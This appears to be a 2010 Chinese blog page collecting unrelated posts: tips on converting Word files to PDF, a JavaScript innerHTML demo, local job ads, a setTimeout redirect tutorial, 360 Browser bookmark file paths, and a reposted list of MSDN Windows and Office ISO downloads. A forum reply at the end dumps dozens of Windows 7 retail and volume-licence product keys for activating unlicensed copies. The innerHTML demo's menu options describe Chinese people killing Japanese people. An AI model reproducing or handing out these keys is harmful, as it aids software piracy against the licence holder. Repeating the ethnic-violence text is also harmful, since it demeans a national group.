如何将Word文档另存为PDF文档

2010年8月31日星期二 | | 0 评论 |

如何将Word文档另存为PDF文档
 
方法一:
利用Adobe公司的Adobe Acrobat Professional进行转化。注意,一定是Professional版本的,Reader版本没有这个功能。
首先安装Adobe Acrobat Professional(目前最高版本为7.0),系统会自动产生一个虚拟打印机PDFMaker,这下明白了吗?你可以打开要转化的文档,用刚产生的虚拟打印机进行打印就可以了。不过,对于Word、Excel、PowerPoint等来说,最好还是直接转化。仔细观察你的Word程序,是不是发现多了一个PDFMaker工具栏呢?点里面的第一项,就可以了。
安装了Adobe Acrobat Professional后最大的好处是,利用Adobe Acrobat Professional可以对PDF各式的文档进行编辑,如果你已经安装了该软件,我想你很快会使用的。
而且,Adobe Acrobat Professional还可以将你电脑上的图片转化为PDF文档,在你需要的时候,在用Adobe Acrobat Professional将PDF文档另存为图片。

方法二:
安装pdfFactory Pro,同样也会产生一个虚拟打印机,这样,你就可以把你所能打印的一切材料都转化为PDF格式。

方法三:
利用Macromedia FlashPaper进行转化。
在FlashPaper安装之后,会自动在在Word等软件中会添加一个名为"FlashPaper"的菜单和一个有三个按钮的工具栏(与Adobe Acrobat Professional类似),从左到右依次为:将当前文档转换成Flash动画;把文档转换成pdf文档;转换成pdf文件并用Email发送。利用该工具栏,可以轻松的把Word文档转换成swf或pdf文件。
在其他程序中,如记事本中打开一个文件,单击"文件→打印",打印机选择"Macromedia FlashPaper",单击"首选项"可改变其页面属性。单击"确定",会自动启动FlashPaper进行打印,并把打印结果显示出来。
利用"Save as Macromedia Flash"和"Save as PDF"两个按钮,即可把文档保存为swf动画或pdf电子书。运行生成的swf文件,利用上方的工具条可以控制swf文件的显示。
 
方法四:
安装 Foxit PDF Creator会自动安装一个Foxit PDF Printer的打印机,再文档中打印出来会自动另存为PDF格式.
 
用WPS将Word文档转化成PDF格式
两步:
第一步:用WPS文字打开要转换的Word文档
第二步:选择[文件]-[输出为PDF格式],在随即出现的对话框内设置PDF的格式输出需要,点击[确认]就OK了!

innerHTML的应用(转)

2010年8月30日星期一 | | 0 评论 |

一个简单的例子
 
<%@ page language="java" import="java.util.*" pageEncoding="GBK"%>
<%
String path = request.getContextPath();
String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>根据JAVASCRIPT设置innerHTML</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<script language="javascript">
//这个函数是根据用户设置的数字去重新生成innerHTML
function setid()
{
    str='<br>';   
    if(!window.form1.upcount.value)
        window.form1.upcount.value=1;
    for(i=1;i<=window.form1.upcount.value;i++)
        //str+='文件'+i+':<input type=file name=file'+i+' style=width:400><br><br>';
        str=getStrValue();
    //alert(str);
    window.upid.innerHTML=str+'<br>';
}
//增加一个
function setSetAddOne()
{
    var str;
    var id=eval(window.form1.upcount.value);
    id+=1;
    window.form1.upcount.value=id;
    str=window.upid.innerHTML;
    str+=addOne(id);
    window.upid.innerHTML=str;
}
//取得最终生成的innerHTML
function getStrValue()
{
    var str='';
    if(!window.form1.upcount.value)
        window.form1.upcount.value=1;
    //alert(window.form1.upcount.value);
    for(i=1;i<=window.form1.upcount.value;i++)
    {
        str+=addOne(i);
        //alert(str);
    }
    return str;
}
//返回增加一项的字符,参数是当前是每几个
function addOne(i)
{
    var str='请选择操作项:<select name=select'+i+'><option value=1>中国人打死日本人</option><option value=2>中国人踢死日本人</option><option value=3>中国人玩死日本人</option></select><br><br>';
    return str;
}
</script>
<body bgcolor="#FFFFFF" text="#000000">
<form name=form1>
  <br>
  <table>   
    <tr align="left" valign="middle" bgcolor="#eeeeee">
      <td bgcolor="#eeeeee" height="92">
        <li> 设置个数
          <input type="text" name="upcount" value="1">
          <input type="button" name="Button" onclick="setid();" value="· 设定 ·">
      <input type="button" name="ButtonAdd" onclick="setSetAddOne();" value="· 增加 ·">
        </li>
      </td>
    </tr>
    <tr align="center" valign="middle">
      <td align="left" id="upid" height="122">
        请选择操作项:<select name=select1><option value=1>中国人打死日本人</option><option value=2>中国人踢死日本人</option><option value=3>中国人玩死日本人</option></select>
      </td>
    </tr>       
  </table>
</form>
</body>
</html>
<!-- 是一个HTML面页,拿下去就可以看效果,不用配什么的 -->

诚聘外贸业务员

| | 0 评论 |

年龄要求:21岁-30岁
工作地点:福州市
专业要求:经济学 国际经济与贸易 英语 外贸英语 商务英语
性别要求:女

诚聘外贸业务员 。 要求:英语四级 , 性别:女 ,有上进心 工作内容:到B2B平台上发布产品广告,寻找客户, 待遇:包午餐晚餐,工作环境良好,试用期3个月(试用期工资第一个月1000,第2,3月1200,试用期结束工资1500+抽成,员工工作1年以上底薪增加300-500)。 

本公司专业从事服装,鞋帽出口,产品主要销往欧美等国家。公司提供 具有竟争力的薪酬,广阔的平台和人性化的环境,欢迎各位外贸人才加入公司,共谋发展

hr job 招聘外贸业务员

| | 0 评论 |

http://www.haixirc.com/Jobs_450063.html

我公司经营服装鞋帽等产品,主要出口欧美国家。
因业务扩展,现招聘外贸业务员和外贸业务助理数名。

工作内容:网络业务,包括更新产品信息,回复客人询盘,订单制做,售后回访。

工资待遇:试用期一个月,工资1000,第二个月1500底薪+业绩抽成,
工作满3个月后,视工作情况,另加底薪 (有经验者,待遇面议)


一经录用,公司将为每位同事提供住宿
住宿条件:两个人一宿舍,配备洗衣机,电冰箱,热水器,宽带网络,厨房用具等

1、适应晚班者,能吃苦耐劳者,工作时间:早9:00-12:00,晚7:00-12:00,
下午不上班,每月休息2天(可调休),法定节假日(国庆,中秋,春节等)正常放假。

2、大学英语四级以上或同等水平。级别高者优先录用。

3、工作经验和专业不限,公司有上岗培训,欢迎广大应届毕业生加入。

4、熟悉电脑操作,熟悉office,word等办公软件;打字速度要快 

5、善于沟通,学习领悟能力强,对外贸较感兴趣者;


公司地址:福州苍山区浦上大道
联系电话:18959162297 联系人:李先生,林小姐 (非诚勿扰)
公交线路,125路,82路,89路 ,315路,98路

 
 
 
职位要求
  1. 简历: 不限
  2. 性别: 不限
  3. 年龄: 18 到 25 岁
  4. 学历: 不低于本科
  5. 经验: 最低一年以上
  6. 薪水: 1800-2000 (元/月)
  7. 附加: 无附加
职位描述
本公司现在急招聘一个在阿里巴巴上有经验做过的外贸业务员。
如果有能力者工资和待遇尽量满足招聘者

本公司主要经营服装,鞋子,箱包,产品等。
工作知识要求:
1:英语四级或以上。对网络贸易有强烈兴趣和认识
2:具收集市场信息,分析客户,开发国外的客户,制定销售计划的能力。
3:熟悉相关计算机办公软件如WORD/EXCEL等的运用和INTERNET知识。
4:具备独立作业之能力,负责公司外贸销售跟单及时处理客户反馈信息。
5:公司提供平台(阿里巴巴,tradekey,madeinchina,等),能靠网络、电话等工具完成客户开发与筛选
6:熟悉电子商务流程和电子商务平台流程(阿里巴巴,tradekey,madeinchina,等),有外贸电子商务经验者优先。

工作态度要求:
1:善于调理和总结,肯吃苦,有信心恒心事业心,敢于挑战高薪始终保持一种尽善尽美的激情工作态度,满怀希望和热情并且愿与公司共同发展。
2:自信乐观,责任心强,善于交际
3:工作认真塌实,努力勤奋,能吃苦
4:适应能力强,接受能力好,较强的抗压能力
5:强调团队合作精神
公司待遇:
工资:1000-2000以上加丰富抽成
具体抽成面谈
包吃包住
工作8个小时/天(暂定为早上10:00-12:00,晚上20:00-02:00),
每周休息一天
应聘者请随身带上个人简历、毕业证书复印件及身份证复印件)
请有意者速电联系13559468288 林先生
www.shoesfashion168.com is an chinese-based, Internet wholesaler of brand name sneaker and clothes including Nike, Air Max shoes, Jordan, Gucci,Dsquared,reebok,Air Force one shoes, Adidas, prada, Puma,Bape,Timberland,Gucci,Nike Dunks, Nike air and other world popular brand names. We specialize in selling sport style sneakers and professional athletic shoes. We also manage to find limited editions,Jordan retro styles, shop ,and older editions as well as the newest and best brand. Our new products are actived everday.
With authentic products and a sophisticated customer service system, www.shoesfashion168.com has earned the higher reputation among the online shoes stores. We are a well managed corporation and the one company you can trust with all your athletic and collectible shoe needs. We're even a good trade company in European countries.
联系我们
  1. 联系: 林先生
  2. 电话: 13559468288  
  3. 邮箱: [email protected]  
  4. 地址: 福州市晋安区大景城

JavaScript 的延时跳转

| | 0 评论 |

        <script type="text/javascript">
            window.setTimeout(function(){
                window.location = "http://www.youdao.com";
            }, 3000);  //3000ms=3s
        </script>

setTimeout (表达式,延时时间)
setTimeout(表达式,交互时间)
延时时间/交互时间是以豪秒为单位的(1000ms=1s) setTimeout 在执行时,是在载入后延迟指定时间后,去执行一次表达式,仅执行一次
setTimeout 在执行时,它从载入后,每隔指定的时间就执行一次表达式
1,基本用法:
执行一段代码:

复制代码 代码如下:

var i=0;
setTimeout("i+=1;alert(i)",1000);


执行一个函数:

复制代码 代码如下:

var i=0;
setTimeout(function(){i+=1;alert(i);},1000);


//注意比较上面的两种方法的不同。
下面再来一个执行函数的:

复制代码 代码如下:

var i=0;
function test(){
i+=1;
alert(i);
}
setTimeout("test()",1000);


也可以这样:

复制代码 代码如下:

setTimeout(test,1000);


总结:
setTimeout的原型是这样的:
iTimerID = window.setTimeout(vCode, iMilliSeconds [, sLanguage])
setTimeout有两种形式
setTimeout(code,interval)
setTimeout(func,interval,args)
其中code是一个字符串
func是一个函数.
注意"函数"的意义,是一个表达式,而不是一个语句.
比如你想周期性执行一个函数
function a(){
//...
}
可写为
setTimeout("a()",1000)

setTimeout(a,1000)
这里注意第二种形式中,是a,不要写成a(),切记!!!
展开来说,不管你这里写的是什么,如果是一个变量,一定是一个指向某函数的变量;如果是个函数,那它的返回值就 要是个函数
2,用setTimeout实现setInterval的功能
思路很简单,就是在一个函数中调用不停执行自己,有点像递归

复制代码 代码如下:

var i=0;
function xilou(){
i+=1;
if(i>10){alert(i);return;}
setTimeout("xilou()",1000);
//用这个也可以
//setTimeout(xilou,1000);
}


3,在类中使用setTimeout
终于到正题了,其实在类中使用大家遇到的问题都是关于this的,只要解决了这个this的问题就万事无忧了。
呵呵。让我们来分析一下:

 代码如下:

function xilou(){
this.name="xilou";
this.sex="男";
this.num=0;
}
xilou.prototype.count=function(){
this.num+=1;
alert(this.num);
if(this.num>10){return;}
//下面用四种方法测试,一个一个轮流测试。
setTimeout("this.count()",1000);//A:当下面的x.count()调用时会发生错误:对象不支持此属性或方法。
setTimeout("count()",1000);//B:错误显示:缺少对象
setTimeout(count,1000);//C:错误显示:'count'未定义
//下面是第四种
var self=this;
setTimeout(function(){self.count();},1000);//D:正确
}
var x=new xilou();
x.count();


错误分析:
A:中的this其实指是window对象,并不是指当前实例对象
B:和C:中的count()和count其实指的是单独的一个名为count()的函数,但也可以是window.count(),因为window.count()可以省略为count()
D:将变量self指向当前实例对象,这样js解析引擎就不会混肴this指的是谁了。
话说回来,虽然我们知道setTimeout("this.count()",1000)中的this指的是window对象,但还是不明白为什么会是
window对象^_^(有点头晕...)
那我们可以想象一下这个setTimeout是怎样被定义的:
setTimeout是window的一个方法,全称是这样的:window.setTimeout()
那应该是这样被定义的:

复制代码 代码如下:

window.setTimeout=function(vCode, iMilliSeconds [, sLanguage]){
//.....代码
return timer//返回一个标记符
}


所以当向setTimeout()传入this的时候,当然指的是它所属的当前对象window了。

360浏览器收藏夹及浏览历史的目录位置

2010年8月27日星期五 | | 0 评论 |

360为了不让其他的浏览器使用自己的收藏文件,如果360浏览器主程序崩溃,卸载的过程当中,会出现卡断现象,也就是卸载不完成,无论等待响应多久,都没有用,唯一的方式就是把360目录删除,删除以后,所有搜藏全没了。

其实,360浏览器的收藏路径是在C:\Documents and Settings\自己用户名\Application Data\360se\data\bookmarks.dat这个里面。要注意因为Application Data本是隐藏文件,所以要设为显示所有文件和文件夹才能看得到!

360浏览器的浏览历史路径是在C:\Documents and Settings\自己用户名\Application Data\360se\data\history.dat这个里面。

但是应用导入功能是不行的,只有复制到同样是360浏览器的目录下,覆盖原来的文件才可以!

希望对你有所底底帮助!



[转]Windows 简体中文版 系统资源 MSDN 原版大全

| | 0 评论 |

[转]Windows 简体中文资源 MSDN 原版大全

一、 windows7 简体中文资源MSDN原版下载与SHA1值校验



0.Windows 7 Starter (x86)

文件名 cn_windows_7_starter_x86_dvd_x15-69303.iso
ISO/CRC: 17C3FF16
SHA1: C9B9F3143328AFE62BF3EACA164BE02B17B04532
下载
2,483.60 (MB)

下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
cn_windows_7_starter_x86_dvd_x15-69303.iso 详情     2.4GB
全选     2.4GB

1.文件名 cn_windows_automated_installation_kit_for_windows_7_and_windows_server_2008_r2_x86_x64_ia64_dvd_400075.iso
ISO/CRC: 8079B9B3
SHA1: 02956D721650D0FFE6D7070315F4D899116E821D
下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
cn_windows_automated_installation_kit_for_windows_7_and_windows_server_2008_r2_x86_x64_ia64_dvd_400075.iso 详情     1.7GB
全选     1.7GB

2.文件名 cn_windows_7_professional_vl_build_x64_dvd_x15-71029.iso
ISO/CRC: 4C314388
SHA1: 2270C4A0715B204282AF1E8E05CBDCFCC776EB46
下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
cn_windows_7_professional_vl_build_x64_dvd_x15-71029.iso 详情     3GB
全选     3GB

3.文件名 cn_windows_7_professional_vl_build_x86_dvd_x15-71025.iso
ISO/CRC: 3F585AF3
SHA1: C91EBE17156604336CAB054A9A5186B5162D42A0
下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
cn_windows_7_professional_vl_build_x86_dvd_x15-71025.iso 详情     2.3GB
全选     2.3GB

4.文件名 cn_windows_7_home_basic_x86_dvd_x15-65975.iso
ISO/CRC: E38765C3
SHA1: 9996D685A0429060CFDBA99EFF0011EF34A01A82
下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
cn_windows_7_home_basic_x86_dvd_x15-65975.iso 详情     2.4GB
全选     2.4GB

5.文件名 cn_windows_7_home_premium_x64_dvd_x15-65718.iso
ISO/CRC: F55565B7
SHA1: 5566AB6F40B0689702F02DE15804BEB32832D6A6
下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
cn_windows_7_home_premium_x64_dvd_x15-65718.iso 详情     3.1GB
全选     3.1GB

5.文件名 cn_windows_7_home_premium_x86_dvd_x15-65717.iso
ISO/CRC: E4819CB1
SHA1: CBA410DB30FA1561F874E1CC155E575F4A836B37
下载
2,483.60 (MB)
下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
cn_windows_7_home_premium_x86_dvd_x15-65717.iso 详情     2.4GB
全选     2.4GB

6.文件名 cn_windows_7_professional_x64_dvd_x15-65791.iso
ISO/CRC: 998E430C
SHA1: 5669A51195CD79D73CD18161D51E7E8D43DF53D1
下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
cn_windows_7_professional_x64_dvd_x15-65791.iso 详情     3.1GB
全选     3.1GB

7.文件名 cn_windows_7_professional_x86_dvd_x15-65790.iso
ISO/CRC: 55F360AB
SHA1: EBD595C3099CCF57C6FF53810F73339835CFBB9D

下载
2,483.60 (MB)

下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
cn_windows_7_professional_x86_dvd_x15-65790.iso 详情     2.4GB
全选     2.4GB

8.文件名 cn_windows_7_enterprise_x64_dvd_x15-70741.iso
ISO/CRC: 18FF22E5
SHA1: EE20DAF2CDEDD71C374E241340DEB651728A69C4
下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
cn_windows_7_enterprise_x64_dvd_x15-70741.iso 详情     3GB
全选     3GB

9.文件名 cn_windows_7_enterprise_x86_dvd_x15-70737.iso
ISO/CRC: CEEE9884
SHA1: 50F2900D293C8DF63A9D23125AFEEA7662FF9E54
下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
cn_windows_7_enterprise_x86_dvd_x15-70737.iso 详情     2.3GB
全选     2.3GB

10.文件名 cn_windows_7_ultimate_x64_dvd_x15-66043.iso
ISO/CRC: 05E9026C
SHA1: 4A98A2F1ED794425674D04A37B70B9763522B0D4
下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
cn_windows_7_ultimate_x64_dvd_x15-66043.iso 详情     3.1GB
全选     3.1GB

11.文件名 cn_windows_7_ultimate_x86_dvd_x15-65907.iso
ISO/CRC: E6FDF910
SHA1: B589336602E3B7E134E222ED47FC94938B04354F

下载
2,483.60 (MB)
下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
cn_windows_7_ultimate_x86_dvd_x15-65907.iso 详情     2.4GB
全选     2.4GB

 
 
 

二、windows vista 简体中文资源MSDN原版下载与SHA1值校验


1.文件名 cn_windows_vista_enterprise_with_sp2_x64_dvd_x15-40402.iso
ISO/CRC: AC4B28E4
SHA1: 46E06E24D549FA42A2392C8553470BF9845C9C06

下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
cn_windows_vista_enterprise_with_sp2_x64_dvd_x15-40402.iso 详情     2.9GB
全选     2.9GB

2.文件名 cn_windows_vista_enterprise_with_sp2_x86_dvd_x15-40257.iso
ISO/CRC: FFF7B327
SHA1: 15472EBF0509ED56F46F6F5848D869C320C0B8D5

下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
cn_windows_vista_enterprise_with_sp2_x86_dvd_x15-40257.iso 详情     2.2GB
全选     2.2GB

3.文件名 cn_windows_vista_with_sp2_x64_dvd_x15-36322.iso
ISO/CRC: 5F7599B3
SHA1: A1689C254FB3BD67807EE493EE7D4896BCA39887

下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
cn_windows_vista_with_sp2_x64_dvd_x15-36322.iso 详情     3.6GB
全选     3.6GB

4.文件名 cn_windows_vista_with_sp2_x86_dvd_x15-36285.iso
ISO/CRC: 0DCE86FC
SHA1: DA7F7BDC841DDFFABFF7DDAB6B1158873BF1246D

下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
cn_windows_vista_with_sp2_x86_dvd_x15-36285.iso 详情     2.9GB
全选     2.9GB

_x64_dvd_x14-55848.iso

5.文件名 zh-hans_windows_vista_enterprise_with_service_pack_1_x64_dvd_x14-55848.iso
ISO/CRC: 3ABC9150
SHA1: CFE6ADA55C88F8A6552174C02618D5CE12F8C033

下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
zh-hans_windows_vista_enterprise_with_service_pack_1_x64_dvd_x14-55848.iso 详情     2.8GB
全选     2.8GB

6.文件名 zh-hans_windows_vista_enterprise_with_service_pack_1_x86_dvd_x14-55727.iso
ISO/CRC: 89336A90
SHA1: 3AD7F4B7ECFEB905FD779142EA7500C8394DB5CB

下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
zh-hans_windows_vista_enterprise_with_service_pack_1_x86_dvd_x14-55727.iso 详情     2.1GB
全选     2.1GB

7.文件名 zh-hans_windows_vista_with_service_pack_1_x64_dvd_x14-30733.iso
ISO/CRC: 698BAD8E
SHA1: 65A9AB26AD5A82E5C2F52E0EA976F033E386EBE2

下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
zh-hans_windows_vista_with_service_pack_1_x64_dvd_x14-30733.iso 详情     3.7GB
全选     3.7GB

8.文件名 zh-hans_windows_vista_with_service_pack_1_x86_dvd_x14-30732.iso
ISO/CRC: 8720447A
SHA1: E2898C28A31D38D064C999CE5C92156C6A4DAE05

下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
zh-hans_windows_vista_with_service_pack_1_x86_dvd_x14-30732.iso 详情     2.7GB
全选     2.7GB

9、文件名 cn_windows_vista_x64_dvd_x12-63216.iso
ISO/CRC: 49917B6C
SHA1: 4B7ED66850BB34C818EB282DCFB60C622B411C10

下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
cn_windows_vista_x64_dvd_X12-63216.iso 详情     3.3GB
全选     3.3GB

10.文件名 cn_windows_vista_x86_dvd_x12-59648.iso
ISO/CRC: 0EDE896A
SHA1: 4AC79C50B11BCB2F4FA6A5660084ED748BCA7254

下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
cn_windows_vista_x86_dvd_X12-59648.iso 详情     2.4GB
全选     2.4GB

 
 
 

三、 windows xp 简体中文资源MSDN原版下载与SHA1值校验

1.文件名 sc_winxp_pro_with_sp2.iso
ISO/CRC: N/A
SHA1: 92934976213BB9201057281A200F84127BE0050D

下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
sc_winxp_pro_with_sp2.iso 详情     600.1MB
全选     600.1MB

2.文件名 sc_win_xp_pro_with_sp2_vl.iso
ISO/CRC: N/A
SHA1: C0ADDD927B5D1F93DCE9C455FD6B26EAC7391BE9

下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
sc_win_xp_pro_with_sp2_vl.iso 详情     592.6MB
全选     592.6MB

3.文件名 zh-hans_windows_xp_service_pack_3_x86_cd_x14-60563.iso
ISO/CRC: N/A
SHA1: 5566D7949E45C453964708831E16BCD73547F73B

下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
zh-hans_windows_xp_service_pack_3_x86_cd_x14-60563.iso 详情     398.3MB
全选     398.3MB

4.文件名 zh-hans_windows_xp_professional_with_service_pack_3_x86_cd_vl_x14-74070.iso
ISO/CRC: N/A
SHA1: D142469D0C3953D8E4A6A490A58052EF52837F0F

下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
zh-hans_windows_xp_professional_with_service_pack_3_x86_cd_vl_x14-74070.iso 详情     601MB
全选     601MB

5.文件名 zh-hans_windows_xp_professional_with_service_pack_3_x86_cd_x14-80404.iso
ISO/CRC: N/A
SHA1: 69DBF131116760932DCF132ADE111D6B45778098

下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
zh-hans_windows_xp_professional_with_service_pack_3_x86_cd_x14-80404.iso 详情     601MB
全选     601MB

6.文件名 cn_winxp_home_iso.img
ISO/CRC: N/A
SHA1: BACE4A06BDB82C3B0EDE14730CE031CF53BA8B95

下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
CN_WINXP_HOME_ISO.img 详情     489.7MB
全选     489.7MB

7.文件名 sc_winxp_home_with_sp2.iso
ISO/CRC: N/A
SHA1: F31B766CDBBB84826C09216A4B8CC7DFB1428493

下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
sc_winxp_home_with_sp2.iso 详情     583MB
全选     583MB

8.文件名 cn_winxp_pro_iso.img
ISO/CRC: N/A
SHA1: 73800FE8959F40361BAE3A6553CC66D27D78722E

下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
CN_WINXP_PRO_ISO.img 详情     505.6MB
全选     505.6MB

9.文件名 sc_winxp_sp1.iso
ISO/CRC: N/A
SHA1: E8127BA8975CAA34384E4D573F73B2EFD20CD572

下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
sc_winxp_sp1.iso 详情     298.5MB
全选     298.5MB

 
 
 

四、 office 简体中文资源MSDN原版下载与SHA1值校验

1.文件名 zh-hans_2007_microsoft_office_suite_service_pack_2_x86.exe
ISO/CRC: AD6CC782
SHA1: 777AC1E960E791F4FB34433185E6C12791AF0CE7

下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
zh-hans_2007_microsoft_office_suite_service_pack_2_x86.exe 详情     301.3MB
全选     301.3MB

2.文件名 zh-hans_office_suite_2007_service_pack_1_x86_cd_x13-87870.iso
ISO/CRC: 8A76C991
SHA1: 3AF941C62072A9FE95436C2FF20C4B87184E9B81

下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
zh-hans_office_suite_2007_service_pack_1_x86_cd_x13-87870.iso 详情     549.5MB
全选     549.5MB

3.文件名 cn_office_enterprise_2007_dvd_vl_x12-19567.iso
ISO/CRC: 50605B7C
SHA1: 975C76A28183AC827F62160739FE0F7F4E600645

下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
cn_office_enterprise_2007_DVD_VL_X12-19567.iso 详情     755.5MB
全选     755.5MB

4.文件名 cn_office_professional_2007_cd_x12-42319.iso
ISO/CRC: 29833726
SHA1: A2C010329F0EDD839065374E31BDEFAB01D6B6EF

下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
cn_office_professional_2007_cd_X12-42319.iso 详情     603MB
全选     603MB

5.文件名 cn_office_professional_plus_2007_dvd_x12-38713.iso
ISO/CRC: 8171A38B
SHA1: F08011874038C82B4A3AE547556F0F51EAE42F1D

下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
cn_office_professional_plus_2007_dvd_X12-38713.iso 详情     661.9MB
全选     661.9MB

6.文件名 cn_office_ultimate_2007_dvd_x12-22271.iso
ISO/CRC: B7E21715
SHA1: 740594185CAAC92B300F3EBBCE2C59F5461F9B03

下载地址:
电驴资源
下面是用户共享的文件列表,安装电驴后,您可以点击这些文件名进行下载
cn_office_ultimate_2007_DVD_X12-22271.iso 详情     728.5MB
全选     728.5MB

 
 
 
 

分享到开心网  分享到校内  收藏到QQ书签    订阅本主題RSS更新  美味书签

2月18日 被 无尽空虚之畅通无阻 最后编辑 | 查看全部
readyxumin [铜光盘] 2月17日 2楼 举报

收藏,一会就回家下载

[0] [0] [回复]
asiaharbor1 (楼主) [白光盘] 2月18日 3楼 举报
KH2J9-PC326-T44D4-39H6V-TVPBY
00426-065-1283716-86513


Windows 7 Ultimate Retail Key


6JKV2-QPB8H-RQ893-FW7TM-PBJ73 第三枚神key:
87VT2-FY2XW-F7K39-W3T8R-XMFGF 第四枚"神Key":
236TW-X778T-8MV9F-937GT-QVKBB 第三枚"神Key":
KH2J9-PC326-T44D4-39H6V-TVPBY 第二枚"神Key":
TFP9Y-VCY3P-VVH3T-8XXCC-MF4YK 第一枚"神Key":
D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV



J783Y-JKQWR-677Q8-KCXTF-BHWGC
C4M9W-WPRDG-QBB3F-VM9K8-KDQ9Y
2VCGQ-BRVJ4-2HGJ2-K36X9-J66JG
MGX79-TPQB9-KQ248-KXR2V-DHRTD
FJHWT-KDGHY-K2384-93CT7-323RC



THHH2-RKK9T-FX6HM-QXT86-MGBCP
D8BMB-BVGMF-M9PTV-HWDQW-HPCXX
GTWV3-KH84H-M94BG-PVT2W-JFPRW
89Q2G-GBRGH-KFWRJ-Q72FD-GHYB7
J3X6R-HPF6X-FQRDR-WTPM7-J92GK
7KG4K-T2PTK-8YGQT-QX68X-RGRQ3
TQMMV-43FFG-RGXMY-KMVFY-MB8JW
8483D-TTKCX-CTDR6-XQXTH-X9JG4
BVFKK-9X3FC-XPF4D-W8GTF-WKWD3
CVJ4C-JYKHR-H72R7-6P3BK-K2CH7
MTMKQ-B8BJK-736FJ-F93WC-8XJHX





Enterprise MAK
7RWBY-WT9KY-3BDJ2-9PYWC-GXKTP

Professional MAK
XF6B9-DQGTB-XHVPR-JTD9F-QGDDW


-----------------------------------------





Windows 7 Professional Retail Key

HWRFF-2FFYX-XFXP2-DYFC3-BX3B7
YT9K9-4R938-3TVXX-3Q3QT-9HBXM
C3X7Y-R6WWH-BRXRD-FY84C-FXWHK
XJBR4-M42Q4-QPJ9C-BRDRJ-KHPVY
TF3Q7-YYP8R-D78R7-W9Q9M-DXVBK
J8D39-J2WM3-6368H-JV8G9-BYJJQ
P3H89-V3P2R-JVBTF-YM2J2-FTMT3
RGM4T-3VT6B-GTYPY-3FHP2-HV2YJ
TTY4D-RDKK9-TYB2T-68WJW-M69KJ
BWPX2-XK2T8-3GV2W-KHQVP-QXCDV
49CGJ-4MTTF-WCM4W-K8WMG-3G2VT
BKFRB-RTCT3-9HW44-FX3X8-M48M6
3YHKG-DVQ27-RYRBX-JMPVM-WG38T
HYF8J-CVRMY-CM74G-RPHKF-PW487



Windows 7 Home Premium Retail Key

MVW82-3R7QW-Y4QDM-99M3V-C4QW3
PPBK3-M92CH-MRR9X-34Y9P-7CH2F
Q8JXJ-8HDJR-X4PXM-PW99R-KTJ3H
8489X-THF3D-BDJQR-D27PH-PJ3HC
TWF78-W7H8T-KXD8C-YDFCQ-HK4WG
BFTWY-X2PJR-VJP8V-KGBPJ-FWBMP
RHVHB-VYF67-9FT4M-2WXR8-P3C6R
38CGD-Q6RHB-37BVW-Y3XK7-3CJVC
86GG2-DBVT6-KYQQ6-XFK9R-896MF
4CBPF-W7GXG-J4J8F-GHG79-Q9YT8
D3PVQ-V7M4J-9Q9K3-GG4K3-F99JM
76BRM-9Q4K3-QDJ48-FH4F3-9WT2R
RHPQ2-RMFJH-74XYM-BH4JX-XM76F


Windows 7 Home Basic Retail Key

P4DBR-8YPT6-KHRB8-6T7RW-GMXGV
FGTCF-8JBG2-4BK4G-36JWB-PFQXB
CW4KD-MK47X-JYQ7Y-DKKTR-86TH7
